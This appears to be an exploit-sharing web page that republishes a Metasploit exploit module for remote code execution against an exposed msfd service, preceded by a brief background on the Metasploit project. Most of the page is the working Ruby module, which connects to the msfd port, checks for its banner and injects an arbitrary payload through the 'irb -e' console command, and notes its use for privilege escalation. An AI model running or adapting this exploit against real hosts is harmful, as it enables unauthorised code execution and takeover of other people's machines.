Metasploit Framework – ‘msfd’ Remote Code Execution (Metasploit)

Authors:Metasploit          Risk:High

CVE:NO                     0day:Remote Code Execution 

0day -id:0DAY-176136        Date:2018-05-03

Background

The Metasploit project is a computer security project designed to provide security vulnerability information. It can assist security engineers in penetration testing and signature development of intrusion detection systems.

The most well-known subproject of the Metasploit project is the open source Metasploit framework, a set of tools for the development and execution of “exploit code” for remote hosts. Other important subprojects include the Opcode database, shellcode files, security research, and more.

The well-known features of the Metasploit project also include anti-forensics and circumvention tools, some of which have been built into the Metasploit Framework.

Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Tcp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Metasploit msfd Remote Code Execution',
      'Description'    => %q{
      Metasploit's msfd-service makes it possible to get a msfconsole-like
      interface over a TCP socket. If this socket is accessible on a remote
      interface, an attacker can execute commands on the victim's machine.
 
      If msfd is running with higher privileges than the current local user,
      this module can also be used for privilege escalation. In that case,
      port forwarding on the compromised host can be used.
 
      Code execution is achieved with the msfconsole command: irb -e 'CODE'.
      },
      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
      'License'        => BSD_LICENSE,
      'Platform'       => "ruby",
      'Arch'           => ARCH_RUBY,
      'Payload'        =>
        {
          'Space'    => 8192,   # Arbitrary limit
          'BadChars' => "\x27\x0a",
          'DisableNops' => true
        },
      'Targets'  =>
        [
          [ 'Automatic', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 11 2018',  # Vendor notification
      'DefaultTarget'  => 0))
 
    register_options(
      [
        Opt::RPORT(55554)
      ])
  end
 
  def check
    connect
    data = sock.get_once
    if data.include?("msf")
      disconnect
      return Exploit::CheckCode::Appears
    end
    disconnect
    return Exploit::CheckCode::Unknown
  end
 
  def exploit
    connect
    sock.get_once
    sock.put "irb -e '" + payload.encoded + "'\n"
    disconnect
  end
end

 

Leave a Reply